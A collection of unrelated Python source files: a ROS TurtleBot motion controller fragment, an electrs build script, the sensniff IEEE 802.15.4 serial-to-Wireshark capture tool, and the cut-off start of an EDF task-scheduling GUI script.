callbacks.get("bump_center") or self.skip self.bump_left = callbacks.get("bump_left") or self.skip self.bump_right = callbacks.get("bump_right") or self.skip self.walk_done = callbacks.get("walk_done") or self.skip self.rotate_done = callbacks.get("rotate_done") or self.skip def start(self): self.thread = Thread(target = self.spin) self.thread.daemon = True self.thread.start() def spin(self): rate = rospy.Rate(15) cmd_vel = rospy.Publisher("cmd_vel", Twist, queue_size = 10) self.set_twist(0.0, 0.0) self.init(self) while not self.shutdown: state = self.robot.get_state() if self.change_cmd: self.change_cmd -= 1 cmd_vel.publish(self.stop_msg) else: if self.to_walk > 0.0: self.to_walk -= state.translation if self.to_walk <= 0.0: self.to_walk = 0.0 self.set_twist(0.0, 0.0) self.walk_done(self) if self.change_cmd: cmd_vel.publish(self.stop_msg) else: cmd_vel.publish(self.twist) if self.to_rotate > 0.0: self.to_rotate -= state.rotation if self.to_rotate <= 0.0: self.to_rotate = 0.0 self.set_twist(0.0, 0.0) self.rotate_done(self) if self.change_cmd: cmd_vel.publish(self.stop_msg) else: cmd_vel.publish(self.twist) if state.bump_center: self.bump_center(self) elif state.bump_left: self.bump_left(self) elif state.bump_right: self.bump_right(self) rate.sleep() cmd_vel.unregister() def set_twist(self, vx, wz): if vx == 0.0 and wz == 0.0: self.twist = self.stop_msg else: self.twist = Twist() self.twist.linear.x = vx self.twist.linear.y = 0 self.twist.linear.z = 0 self.twist.angular.x = 0 self.twist.angular.y = 0 self.twist.angular.z = wz def skip(self, robot): if self.commands: cmd, val = self.commands.pop(0) cmd(val) else: self.terminar() def andar(self, meters): self.change_cmd = 3 self.to_rotate = 0.0 if meters > 0: self.to_walk = meters self.set_twist(LINEAR, 0.0) def rodar(self, radians): self.change_cmd = 3 self.to_walk = 0.0 if radians > 0: self.to_rotate = radians self.set_twist(0.0, ANGULAR) elif radians < 0: self.to_rotate = -radians self.set_twist(0.0, -ANGULAR) def executar_depois(self, cmd, value): self.commands.append((getattr(self, cmd), value)) def cancelar_comando(self): if self.to_walk > 0.0 or self.to_rotate > 0.0: self.to_walk = 0.0 self.to_rotate = 0.0 self.set_twist(0.0, 0.0) if self.commands: cmd, val = self.commands.pop(0) cmd(val) def conta(self): self.contador += 1 def desconta(self): self.contador -= 1 def terminar(self): self.to_walk = 0.0 self.to_rotate = 0.0 self.set_twist(0.0, 0.0) self.shutdown = True ############################################################################### # Robot Controller ############################################################################### class RobotController(object): def __init__(self, callbacks): self.robot = Robot() self.publisher = Publisher(self.robot, callbacks) self.odom = None self.bump = None self.odom_callback = self._on_first_odom def run(self): rospy.init_node("turtlebot") self.odom = rospy.Subscriber("odom", Odometry, self._on_odom) self.bump = rospy.Subscriber("events/bumper", BumperEvent, self._on_bump) try: rospy.spin() except rospy.ROSInterruptException as e: pass finally: self.odom.unregister() self.odom = None self.bump.unregister() self.bump = None self.publisher.shutdown = True self.publisher.thread.join() self.publisher.thread = None def _on_odom(self, msg): x = msg.pose.pose.position.x y = msg.pose.pose.position.y q = msg.pose.pose.orientation (roll, pitch, yaw) = euler_from_quaternion((q.x, q.y, q.z, q.w)) self.odom_callback(x, y, yaw) def _on_first_odom(self, x, y, a): self.robot.x = x self.robot.y = y self.robot.a = a self.publisher.start() self.odom_callback = self.robot.set_odometry def _on_bump(self, msg): if msg.state == BumperEvent.PRESSED: if msg.bumper == BumperEvent.CENTER: self.robot.set_bumper(True, False, False) elif msg.bumper == BumperEvent.LEFT: self.robot.set_bumper(False, True, False) elif msg.bumper == BumperEvent.RIGHT: self.robot.set_bumper(False, False, True)
build_electrs.py
#!/usr/bin/env python3 import argparse import logging import os import sys import shutil GIT_REPO = "https://github.com/BitcoinUnlimited/electrs.git" GIT_BRANCH = "v0.7.0bu" EXPECT_HEAD = "8e1734d5d54339cc469ea6230b0e02395f2ab82d" ROOT_DIR = os.path.realpath( os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)) ELECTRS_DIR = os.path.join(ROOT_DIR, "electrs") parser = argparse.ArgumentParser() parser.add_argument('--allow-modified', help='Allow building modified/dirty repo', action = "store_true") parser.add_argument('--verbose', help='Sets log level to DEBUG', action = "store_true") parser.add_argument('--dst', help='Where to copy produced binary', default=os.path.join(ROOT_DIR, "src")) parser.add_argument('--target', help='Target platform (e.g. x86_64-pc-linux-gnu)', default="x86_64-unknown-linux-gnu") args = parser.parse_args() level = logging.DEBUG if args.verbose else logging.INFO logging.basicConfig(format = '%(asctime)s.%(levelname)s: %(message)s', level=level, stream=sys.stdout) def bail(*args): logging.error(*args) sys.exit(1) def check_dependencies(): v = sys.version_info if v[0] < 3 or (v[0] == 3 and v[1] < 3): bail("python >= 3.3 required"); try: import git except Exception as e: logging.error("Failed to 'import git'") logging.error("Tip: On Debian/Ubuntu you need to install python3-git") bail(str(e)) import shutil if shutil.which("cargo") is None: logging.error("Cannot find 'cargo', will not be able to build electrs") logging.error("You need to install rust (1.28+) https://rustup.rs/") bail("rust not found") if not os.path.isdir(args.dst): bail("--dst provided '%s' is not a directory", args.dst) def clone_repo(): import git logging.info("Cloning %s to %s", GIT_REPO, ELECTRS_DIR) repo = git.Repo.clone_from(GIT_REPO, ELECTRS_DIR, branch=GIT_BRANCH) def verify_repo(allow_modified): import git repo = git.Repo(ELECTRS_DIR) if repo.is_dirty(): logging.error("Validation failed - electrs has local modifications.") allow_modified or bail("Bailing") if repo.head.object.hexsha != EXPECT_HEAD: # TODO: Add command line option to reset HEAD to GIT_BRANCH at EXPECT_HEAD logging.error("Validation failed - electrs HEAD differs from expected (%s vs %s)", repo.head.object.hexsha, EXPECT_HEAD) allow_modified or bail("Bailing") def output_reader(pipe, queue): try: with pipe: for l in iter(pipe.readline, b''): queue.put(l) finally: queue.put(None) def cargo_run(args): import subprocess from threading import Thread from queue import Queue cargo = shutil.which("cargo") args = [cargo] + args logging.info("Running %s", args) assert cargo is not None p = subprocess.Popen(args, cwd = ELECTRS_DIR, stdout = subprocess.PIPE, stderr = subprocess.PIPE) q = Queue() Thread(target = output_reader, args = [p.stdout, q]).start() Thread(target = output_reader, args = [p.stderr, q]).start() for line in iter(q.get, None): logging.info(line.decode('utf-8').rstrip()) p.wait() rc = p.returncode assert rc is not None if rc != 0: bail("cargo failed with return code %s", rc) def get_target(makefile_target): # Try to map target passed from makefile to the equalent in rust # To see supported targets, run: rustc --print target-list target_map = { 'x86_64-pc-linux-gnu' : 'x86_64-unknown-linux-gnu', 'i686-pc-linux-gnu' : 'i686-unknown-linux-gnu' } if makefile_target in target_map: return target_map[makefile_target] logging.warn("Target %s is not mapped, passing it rust and hoping it works" % makefile_target) return makefile_target check_dependencies() if not os.path.exists(ELECTRS_DIR): clone_repo() verify_repo(args.allow_modified) cargo_run(["build", "--verbose", "--locked", "--release", "--target=%s" % get_target(args.target)]) cargo_run(["test", "--verbose", "--locked", "--release", "--target=%s" % get_target(args.target)]) src = os.path.join(ELECTRS_DIR, "target", get_target(args.target), "release", "electrs") logging.info("Copying %s to %s", src, args.dst) shutil.copy(src, args.dst) logging.info("Done")
sensniff.py
#!/usr/bin/env python3 # Copyright (c) 2012, George Oikonomou (oikonomou@users.sf.net) # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the owner nor the names of its contributors may be # used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # Read IEEE802.15.4 frames from a serial line (captured by a sniffer) and pipe # them to wireshark. At the same time, the frames can be logged to a file for # subsequent offline processing # In interactive mode, the user can also input commands from stdin # ToDo: # * Configuration file support (ConfigParser ?) import serial import argparse import os import sys import select import time import stat import errno import logging import logging.handlers import struct import typing import time from threading import Thread from threading import Timer ##################################### ### Constants ##################################### __version__ = '1.3' ##################################### ### Default configuration values ##################################### defaults = { #'device': '/dev/ttyUSB0', 'device': None, 'channels': [1,3,5], #'baud_rate': 460800, 'baud_rate': 921600, 'out_file': 'sensniff.hexdump', 'out_fifo': '/tmp/sensniff', 'out_pcap': 'sensniff.pcap', 'debug_level': 'WARN', 'log_level': 'INFO', 'log_file': 'sensniff.log', } ##################################### ### PCAP and Command constants ##################################### LINKTYPE_IEEE802_15_4_NOFCS = 230 LINKTYPE_IEEE802_15_4 = 195 LINKTYPE_IEEE802_15_4_TAP = 283 MAGIC_NUMBER = 0xA1B2C3D4 VERSION_MAJOR = 2 VERSION_MINOR = 4 THISZONE = 0 SIGFIGS = 0 SNAPLEN = 0xFFFF NETWORK = LINKTYPE_IEEE802_15_4 PCAP_GLOBAL_HDR_FMT = '<LHHlLLL' PCAP_FRAME_HDR_FMT = '<LLLL' pcap_global_hdr = bytearray(struct.pack(PCAP_GLOBAL_HDR_FMT, MAGIC_NUMBER, VERSION_MAJOR, VERSION_MINOR, THISZONE, SIGFIGS, SNAPLEN, NETWORK)) def get_global_header(network:int) -> bytearray: return bytearray(struct.pack(PCAP_GLOBAL_HDR_FMT, MAGIC_NUMBER, VERSION_MAJOR, VERSION_MINOR, THISZONE, SIGFIGS, SNAPLEN, network)) CMD_FRAME = 0x00 CMD_CHANNEL = 0x01 CMD_CHANNEL_MIN = 0x02 CMD_CHANNEL_MAX = 0x03 CMD_PREAMBLE_CODE = 0x04 CMD_PRF = 0x05 CMD_DEBUG_MSG = 0x10 CMD_FRAME_TIME = 0x20 CMD_ERR_NOT_SUPPORTED = 0x7F CMD_GET_CHANNEL = 0x81 CMD_GET_CHANNEL_MIN = 0x82 CMD_GET_CHANNEL_MAX = 0x83 CMD_SET_CHANNEL = 0x84 CMD_SET_PREAMBLE_CODE = 0x85 CMD_SET_PRF_CODE = 0x86 SNIFFER_PROTO_VERSION = 2 ##################################### ### Globals ##################################### logger = logging.getLogger(__name__) stats = {} stop = False ##################################### #TODO: Extend pcap output with channel informtion (https://github.com/jkcko/ieee802.15.4-tap/blob/master/IEEE%20802.15.4%20TAP%20Link%20Type%20Specification.pdf) class Frame(object): def __init__(self, raw, timestamp, channel=-1): self.__raw = raw self.__t = timestamp self.len = len(self.__raw) self.rx_channel = channel self.__pcap_hdr = self.__generate_frame_hdr(self.len) self.pcap = bytearray(self.__pcap_hdr) + self.__raw self.hex = ''.join('%02x ' % c for c in self.__raw).rstrip() def __generate_frame_hdr(self, len: int): sec = int(self.__t) usec = int((self.__t - sec) * 1000000) return struct.pack(PCAP_FRAME_HDR_FMT, sec, usec, len, len) def get_pcap(self): return self.pcap def get_pcap_tap(self): """ Creates a pcap format that includes more state (currently only rx channel) information """ tap_tlvs = bytearray([]) # FCS type TLV fcs_tlv = bytearray((0).to_bytes(2,byteorder='little')) + bytearray((1).to_bytes(2, byteorder='little')) + bytearray([1]) + bytearray([0,0,0]) tap_tlvs += fcs_tlv # Channel TLV if self.rx_channel > 0: # Got channel information. Add this as a TLV channel_tlv = bytearray((3).to_bytes(2, byteorder='little')) + bytearray((3).to_bytes(2, byteorder='little')) # Type 3 (Channel), Length 3 (excluding padding) channel_tlv += bytearray(self.rx_channel.to_bytes(2,byteorder='little')) #channel number channel_tlv += bytearray([0]) # Channel page channel_tlv += bytearray([0]) # padding tap_tlvs += channel_tlv header_len = len(tap_tlvs) + 4 pcap_tap = bytearray([0,0]) pcap_tap += bytearray(header_len.to_bytes(2, byteorder="little")) pcap_tap += tap_tlvs pcap_tap += self.__raw # GENERATE THE PACKET HEADER pcap_header = self.__generate_frame_hdr(len(pcap_tap)) pcap_tap = bytearray(pcap_header) + pcap_tap return pcap_tap def get_hex(self): return self.hex ##################################### class SerialInputHandler(object): """ Creates a serial connection to the SenSniff supported device. The connection is used to receive sniffed frames and send commands to the device. """ def __init__(self, port = defaults['device'], baudrate = defaults['baud_rate'], rts_cts = False): self.__sensniff_magic_legacy = bytearray((0x53, 0x6E, 0x69, 0x66)) self.__sensniff_magic = bytearray((0xC1, 0x1F, 0xFE, 0x72)) stats['Captured'] = 0 stats['Non-Frame'] = 0 stats['Timestamps'] = list() self.rx_channel = 0 try: self.port = serial.Serial(port = port, baudrate = baudrate, bytesize = serial.EIGHTBITS, parity = serial.PARITY_NONE, stopbits = serial.STOPBITS_ONE, xonxoff = False, rtscts = rts_cts, timeout = 0.1) self.port.flushInput() self.port.flushOutput() except (serial.SerialException, ValueError, IOError, OSError) as e: logger.error('Error opening port: %s' % (port,)) logger.error('The error was: %s' % (e.args,)) sys.exit(1) logger.info('Serial port %s opened' % (self.port.name)) def read_frame(self): try: # Read the magic + 1 more byte b = self.port.read(5) size = len(b) except (IOError, OSError) as e: logger.error('Error reading port: %s' % (self.port.port,)) logger.error('The error was: %s' % (e.args,)) sys.exit(1) if size == 0: return b if size < 5: logger.warning('Read %d bytes but not part of a frame' % (size,)) self.port.flushInput() return '' if b[0:4] not in (self.__sensniff_magic, self.__sensniff_magic_legacy): # Peripheral UART output - print it per_out = self.port.readline().rstrip() try: logger.info("Peripheral: %s%s" % (b.decode(), per_out.decode())) except UnicodeDecodeError as e: logger.info("Error decoding peripheral output: %s"%e) stats['Non-Frame'] += 1 return '' # If we reach here: # Next byte == 1: Proto version 1, header follows # Next Byte != 1 && < 128. Old proto version. Frame follows, length == the byte b = bytearray(b) if b[4] != SNIFFER_PROTO_VERSION: # Legacy contiki sniffer support. Will slowly fade away size = b[4] try: b = self.port.read(size) except (IOError, OSError) as e: logger.error('Error reading port: %s' % (self.port.port,)) logger.error('The error was: %s' % (e.args,)) sys.exit(1) if len(b) != size: # We got the magic right but subsequent bytes did not match # what we expected to receive logger.warning('Read correct magic not followed by a frame') logger.warning('Expected %d bytes, got %d' % (size, len(b))) self.port.flushInput() return '' logger.info('Read a frame of size %d' % (len(b),)) stats['Captured'] += 1 return b # If we reach here, we have a packet of proto ver SNIFFER_PROTO_VERSION # Read CMD and LEN try: size = 0 b = self.port.read(3) size = len(b) except (IOError, OSError) as e: logger.error('Error reading port: %s' % (self.port.port,)) logger.error('The error was: %s' % (e.args[0],)) sys.exit(1) if size < 3: logger.warning('Read correct magic not followed by a frame header') logger.warning('Expected 3 bytes, got %d' % (len(b), )) self.port.flushInput() return '' b = bytearray(b) cmd = b[0] length = b[1] << 8 | b[2] if cmd == CMD_ERR_NOT_SUPPORTED: logger.warning("Peripheral reports unsupported command") return '' # Read the frame or command response b = self.port.read(length) if len(b) != length: # We got the magic right but subsequent bytes did not match # what we expected to receive logger.warning('Read correct header not followed by a frame') logger.warning('Expected %d bytes, got %d' % (length, len(b))) self.port.flushInput() return '' # If we reach here, b holds a frame or a command response of length len if cmd == CMD_FRAME: logger.info('Read a frame of size %d' % (length,)) stats['Captured'] += 1 return b elif cmd == CMD_FRAME_TIME: logger.info('Read frame of size %d' % (length-8,)) stats['Captured'] +=1 # The last 8 bytes are used as a timestamp timestamp_bytes = b[(len(b)-8):len(b)] timestamp = struct.unpack("Q", timestamp_bytes)[0] stats['Timestamps'].append(timestamp) frame = b[0:len(b)-8] return frame elif cmd == CMD_DEBUG_MSG: print('DBG: {}'.format(b.decode('ascii'))) return '' # If we reach here, we have a command response b = bytearray(b) logger.debug('Received a command response: [%02x %02x]' % (cmd, b[0])) # We'll only ever see one of these if the user asked for it, so we are # running interactive. Print away if cmd == CMD_CHANNEL: self.rx_channel = b[0] print('Sniffing in channel: %d' % (b[0],)) elif cmd == CMD_CHANNEL_MIN: print('Min channel: %d' % (b[0],)) elif cmd == CMD_CHANNEL_MAX: print('Max channel: %d' % (b[0],)) elif cmd == CMD_PREAMBLE_CODE: print('Current preamble code %d' % (b[0],)) elif cmd == CMD_PRF: print('Current PRF %dMHz' % (b[0],)) else: logger.warning("Received a command response with unknown code") return '' def __write_command(self, cmd, len = 0, data = bytearray()): bytes = bytearray((SNIFFER_PROTO_VERSION, cmd)) if len > 0: bytes += bytearray((len >> 8, len & 0xFF)) if data is not None: bytes += data self.port.write(self.__sensniff_magic) self.port.write(bytes) self.port.flush() logger.debug('Sent bytes: [' + ''.join('%02x ' % c for c in self.__sensniff_magic) + ''.join('%02x ' % c for c in bytes).rstrip() + ']') def set_channel(self, channel): self.__write_command(CMD_SET_CHANNEL, 1, bytearray((channel,))) def set_preamble_code(self, code): self.__write_command(CMD_SET_PREAMBLE_CODE, 1, bytearray((code,))) def set_pulse_repetition_frequency(self, prf): self.__write_command(CMD_SET_PRF_CODE, 1, bytearray((prf,))) def get_channel(self): self.__write_command(CMD_GET_CHANNEL) def get_channel_min(self): self.__write_command(CMD_GET_CHANNEL_MIN) def get_channel_max(self): self.__write_command(CMD_GET_CHANNEL_MAX) ##################################### class AutodetectSerialInterfaces(object): """ Automatically finds sensniff supported devices. Is used when the user does not supply the serial ports """ # def __init__(self): def find_interfaces(self) -> typing.List[str]: """ Autodetect sensniff devices """ all_devices = os.listdir("/dev") supported_devices = list(filter(lambda x: "cu.usb" in x, all_devices)) return ["/dev/"+d for d in supported_devices] ##################################### class FifoOutHandler(object): """ pcap_tap = If true the TAP Format with channel information will be used """ def __init__(self, out_fifo, pcap_tap=False): self.out_fifo = out_fifo self.of = None self.needs_pcap_hdr = True self.pcap_tap = pcap_tap stats['Piped'] = 0 stats['Not Piped'] = 0 self.__create_fifo() def __create_fifo(self): try: os.mkfifo(self.out_fifo) logger.info('Opened FIFO %s' % (self.out_fifo,)) except OSError as e: if e.errno == errno.EEXIST: if stat.S_ISFIFO(os.stat(self.out_fifo).st_mode) is False: logger.error('File %s exists and is not a FIFO' % (self.out_fifo,)) sys.exit(1) else: logger.warning('FIFO %s exists. Using it' % (self.out_fifo,)) else: raise def __open_fifo(self): try: fd = os.open(self.out_fifo, os.O_NONBLOCK | os.O_WRONLY) self.of = os.fdopen(fd, 'wb') except OSError as e: if e.errno == errno.ENXIO: logger.warning('Remote end not reading') stats['Not Piped'] += 1 self.of = None self.needs_pcap_hdr = True elif e.errno == errno.ENOENT: logger.error('%s vanished under our feet' % (self.out_fifo,)) logger.error('Trying to re-create it') self.__create_fifo_file() self.of = None self.needs_pcap_hdr = True else: raise def handle(self, data): if self.of is None: self.__open_fifo() if self.of is not None: try: if self.needs_pcap_hdr is True: if self.pcap_tap is True: self.of.write(get_global_header(LINKTYPE_IEEE802_15_4_TAP)) else: self.of.write(get_global_header(LINKTYPE_IEEE802_15_4)) # self.of.write(pcap_global_hdr) self.needs_pcap_hdr = False if self.pcap_tap: self.of.write(data.get_pcap_tap()) else: self.of.write(data.pcap) self.of.flush() logger.info('Wrote a frame of size %d bytes' % (data.len)) stats['Piped'] += 1 except IOError as e: if e.errno == errno.EPIPE: logger.info('Remote end stopped reading') stats['Not Piped'] += 1 self.of = None self.needs_pcap_hdr = True else: raise ##################################### class PcapDumpOutHandler(object): def __init__(self, out_pcap, pcap_tap=False): """ Handler to dump the received frames in a pcap file that should be read by wireshark. pcap_tap: If true the TAP frame format will be used to deliver channel information. """ self.out_pcap = out_pcap self.pcap_tap = pcap_tap stats['Dumped to PCAP'] = 0 try: self.of = open(self.out_pcap, 'wb') self.of.write(pcap_global_hdr) logger.info("Dumping PCAP to %s" % (self.out_pcap,)) except IOError as e: self.of = None logger.warning("Error opening %s to save pcap. Skipping" % (out_pcap)) logger.warning("The error was: %d - %s" % (e.args)) def handle(self, frame): if self.of is None: return if self.pcap_tap: self.of.write(frame.get_pcap_tap()) else: self.of.write(frame.get_pcap()) self.of.flush() logger.info('PcapDumpOutHandler: Dumped a frame of size %d bytes' % (frame.len)) stats['Dumped to PCAP'] += 1 ##################################### class HexdumpOutHandler(object): def __init__(self, of): stats['Dumped as Hex'] = 0 try: self.of = open(of, 'w') logger.info("Dumping hex to %s" % (of,)) except IOError as e: logger.warning("Error opening %s for hex dumps. Skipping" % (of)) logger.warning("The error was: %d - %s" % (e.args)) self.of = None def handle(self, frame): if self.of is None: return try: self.of.write('0000 ') self.of.write(frame.get_hex()) self.of.write('\n') self.of.flush() stats['Dumped as Hex'] += 1 logger.info('HexdumpOutHandler: Dumped a frame of size %d bytes' % (frame.len)) except IOError as e: logger.warning("Error writing hex to %s for hex dumps. Skipping" % (self.of)) logger.warning("The error was: %d - %s" % (e.args)) ##################################### def arg_parser(): debug_choices = ('DEBUG', 'INFO', 'WARN', 'ERROR') parser = argparse.ArgumentParser(add_help = False, description = 'Read IEEE802.15.4 frames \ from a sensniff enabled device, convert them to pcap and pipe them \ into wireshark over a FIFO pipe for online analysis. Frames \ can also be saved in a file in hexdump and/or pcap format for offline \ analysis.') in_group = parser.add_argument_group('Serial Line Options') in_group.add_argument('-b', '--baud', type = int, action = 'store', default = defaults['baud_rate'], help = 'Set the line\'s baudrate to BAUD. \ Only makes sense with -d. \ (Default: %s)' % (defaults['baud_rate'],)) in_group.add_argument('-r', '--rts-cts', action = 'store_true', default = False, help = 'Set to enable H/W flow control \ (Default: Flow control disabled.)') out_group = parser.add_argument_group('Output Options') out_group.add_argument('-o', '--out-file', action = 'store', nargs = '?', const = defaults['out_file'], default = False, help = 'Save the capture (hexdump) file OUT_FILE. \ If -o is specified but OUT_FILE is omitted, \ stdout will be used. If the argument is \ omitted altogether, the capture will not \ be saved.') out_group.add_argument('-p', '--pcap', action = 'store', nargs = '?', const = defaults['out_pcap'], default = False, help = 'Save the capture (pcap format) in PCAP. \ If -p is specified but PCAP is omitted, \ %s will be used. If the argument is \ omitted altogether, the capture will not \ be saved.' % (defaults['out_pcap'],)) out_group.add_argument('-pt', '--pcap-tap', action='store_true', default=False, help=""" Use a pcap tap header format that includes more information on the received frames, like the channel it has been received ob """) out_group.add_argument('-F', '--fifo', action = 'store', default = defaults['out_fifo'], help = 'Pipe the capture through FIFO \ (Default: %s)' % (defaults['out_fifo'],)) out_group.add_argument('-O', '--offline', action = 'store_true', default = False, help = 'Disable piping (Mainly used for debugging) \ (Default: Piping enabled)') log_group = parser.add_argument_group('Verbosity and Logging') log_group.add_argument('-n', '--non-interactive', action = 'store_true', default = False, help = 'Run in non-interactive mode, without \ accepting user input. (Default Disabled)') log_group.add_argument('-D', '--debug-level', action = 'store', choices = debug_choices, default = defaults['debug_level'], help = 'Print messages of severity DEBUG_LEVEL \ or higher (Default %s)' % (defaults['debug_level'],)) log_group.add_argument('-L', '--log-file', action = 'store', nargs = '?', const = defaults['log_file'], default = False, help = 'Log output in LOG_FILE. If -L is specified \ but LOG_FILE is omitted, %s will be used. \ If the argument is omitted altogether, \ logging will not take place at all.' % (defaults['log_file'],)) log_group.add_argument('-l', '--log-level', action = 'store', choices = debug_choices, default = defaults['log_level'], help = 'Log messages of severity LOG_LEVEL or \ higher. Only makes sense if -L is also \ specified (Default %s)' % (defaults['log_level'],)) dev_group = parser.add_argument_group('Device options') # Multidevice dev_group.add_argument('-d', '--device', action = 'store', default = defaults['device'], nargs="*", type=str, help = 'Read from device DEVICE \ (Default: %s). \ Add multiple devices if you want to sniff on multiple channels.\ Multiple devices will automatically activate non-interactive mode ' % (defaults['device'],)) # Autodetect dev_group.add_argument('-a', '--autodetect', action='store_true', default=False, help = 'In this mode the connect sniffer device\ will switch through all available PRFs\ (16 MHz & 64MHz) and preamble codes (0-31)\ and try to find other devices sending data.' ) gen_group = parser.add_argument_group('General Options') gen_group.add_argument('-v', '--version', action = 'version', version = 'sensniff v%s' % (__version__)) gen_group.add_argument('-h', '--help', action = 'help', help = 'Shows this message and exits') return parser.parse_args() ##################################### def dump_stats(): print('Frame Stats:') for k, v in list(stats.items()): print('%20s: %d' % (k, v)) ##################################### def log_init(): logger.setLevel(logging.INFO) ch = logging.StreamHandler() ch.setLevel(getattr(logging, args.debug_level)) cf = logging.Formatter('%(message)s') ch.setFormatter(cf) logger.addHandler(ch) if args.log_file is not False: fh = logging.handlers.RotatingFileHandler(filename = args.log_file, maxBytes = 5000000) fh.setLevel(getattr(logging, args.log_level)) ff = logging.Formatter( '%(asctime)s - %(levelname)8s - %(message)s') fh.setFormatter(ff) logger.addHandler(fh) ##################################### def interact_with_serial(input_handler: SerialInputHandler, out_handlers: typing.List): while 1: if args.non_interactive is False: try: if select.select([sys.stdin, ], [], [], 0.0)[0]: cmd = sys.stdin.readline().strip() logger.info('User input: "%s"' % (cmd,)) if cmd in ('h', '?'): print(help_str) elif cmd == 'c': input_handler.get_channel() elif cmd == 'm': input_handler.get_channel_min() elif cmd == 'M': input_handler.get_channel_max() elif cmd == 'n': f.needs_pcap_hdr = True elif cmd == 'q': logger.info('User requested shutdown') dump_stats() sys.exit(0) elif "p " in cmd: code = cmd.split(" ")[1] if int(code) in range(0, 0xFFFF): input_handler.set_preamble_code(int(code)) elif "r " in cmd: rate = cmd.split(" ")[1] if int(rate) in range(0,128): input_handler.set_pulse_repetition_frequency(int(rate)) elif int(cmd) in range(0, 0xFFFF): input_handler.set_channel(int(cmd)) else: raise ValueError except select.error: logger.warning('Error while trying to read stdin') except ValueError: print(err_str) except UnboundLocalError: # Raised by command 'n' when -o was specified at command line pass try: raw = input_handler.read_frame() if len(raw) > 0: t = time.time() timestamps = stats['Timestamps'] t_len = len(timestamps) if t_len > 0 and timestamps[t_len-1] > 0: # Fetch the last timestamp and convert it to seconds. t = timestamps[t_len-1] / 1000000 frame = Frame(bytearray(raw), t, channel=input_handler.rx_channel) for h in out_handlers: h.handle(frame) except (KeyboardInterrupt, SystemExit): logger.info('Shutting down') dump_stats() sys.exit(0) ##################################### def serial_read(input_handler: SerialInputHandler, out_handlers: typing.List): """ Read from serial without interaction """ while not stop: raw = input_handler.read_frame() if len(raw) > 0: t = time.time() timestamps = stats['Timestamps'] t_len = len(timestamps) if t_len > 0 and timestamps[t_len-1] > 0: # Fetch the last timestamp and convert it to seconds. t = timestamps[t_len-1] / 1000000 frame = Frame(bytearray(raw), t, channel=input_handler.rx_channel) for h in out_handlers: h.handle(frame) ##################################### if __name__ == '__main__': args = arg_parser() log_init() logger.info('Started logging') input_handler: SerialInputHandler = None in_handlers = [] devices: typing.List[str] = list() if not args.device: # Find devices devices = AutodetectSerialInterfaces().find_interfaces() else: devices = args.device if len(devices) == 1: input_handler = SerialInputHandler(port = devices[0], baudrate = args.baud, rts_cts = args.rts_cts) time.sleep(2) input_handler.set_channel(args.channels[0]) in_handlers.append(input_handler) else: # Sniff on multiple devices for device in devices: s = SerialInputHandler(port = device, baudrate = args.baud, rts_cts = args.rts_cts) time.sleep(2) in_handlers.append(s) args.non_interactive = True out_handlers = [] if args.offline is not True: f = FifoOutHandler(out_fifo = args.fifo, pcap_tap=args.pcap_tap) out_handlers.append(f) if args.out_file is not False: out_handlers.append(HexdumpOutHandler(of = args.out_file)) if args.pcap is not False: out_handlers.append(PcapDumpOutHandler(args.pcap, args.pcap_tap)) if args.non_interactive is False: help_str = ("Commands:\n" "h,?: Print this message\n" "q: Quit") err_str = 'Unknown Command. Type h or ? for help' print(help_str) threads = list() if len(in_handlers) == 1: if not args.non_interactive: interact_with_serial(input_handler, out_handlers) else: t = Thread(target=serial_read, args=(i,out_handlers)) threads.append(t) t.start() else: for i in in_handlers: t = Thread(target=serial_read, args=(i,out_handlers)) threads.append(t) t.start() try: logger.info("Start sniffing") # for t in threads: # t.join() while 1: time.sleep(0.1) except (KeyboardInterrupt, SystemExit): logger.info('Shutting down') stop = True dump_stats() sys.exit(0)
15_edf_wait_die_gui.py
from functools import reduce from sys import * import numpy as np import random as r import ping_code as pc import socket import struct import subprocess as sp import threading from threading import Thread import ast import time import datetime as dt import os import getpass as gp import psutil from drawnow import * from matplotlib import pyplot as plt from netifaces import interfaces, ifaddresses, AF_INET import paho.mqtt.client as mqtt import smtplib import config import matplotlib matplotlib.use('TkAgg') hosts = {} # {hostname: ip} _tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15}, 't2': {'wcet': 1, 'period': 5, 'deadline': 4}, 't3': {'wcet': 2, 'period': 10, 'deadline': 8}, 't4': {'wcet': 1, 'period': 10, 'deadline': 9}, 't5': {'wcet': 3, 'period': 15, 'deadline': 12} } # mat = {'p0': ['cpu', 'mem', 'storage']} _need = { 't1': [7, 4, 3], 't2': [1, 2, 2], 't3': [6, 0, 0], 't4': [0, 1, 1], 't5': [4, 3, 1] } allocation = { 't1': [0, 1, 0], 't2': [2, 0, 0], 't3': [3, 0, 2], 't4': [2, 1, 1], 't5': [0, 0, 2] } test = [] _time = [] color_code = ['orange', 'brown', 'purple', 'pink', 'blue'] style = ['g--^', 'r:o', 'b-.s', 'm--*', 'k-.>', 'c-.s'] style1 = [{'color': 'g', 'marker': '^'}, {'color': 'aqua', 'marker': '*'}, {'color': 'purple', 'marker': 'X'}, {'color': 'r', 'marker': 'v'}, {'color': 'k', 'marker': '>'}, {'color': 'brown', 'marker': 'D'}, {'color': 'b', 'marker': 's'}, {'color': 'c', 'marker': '1'}, 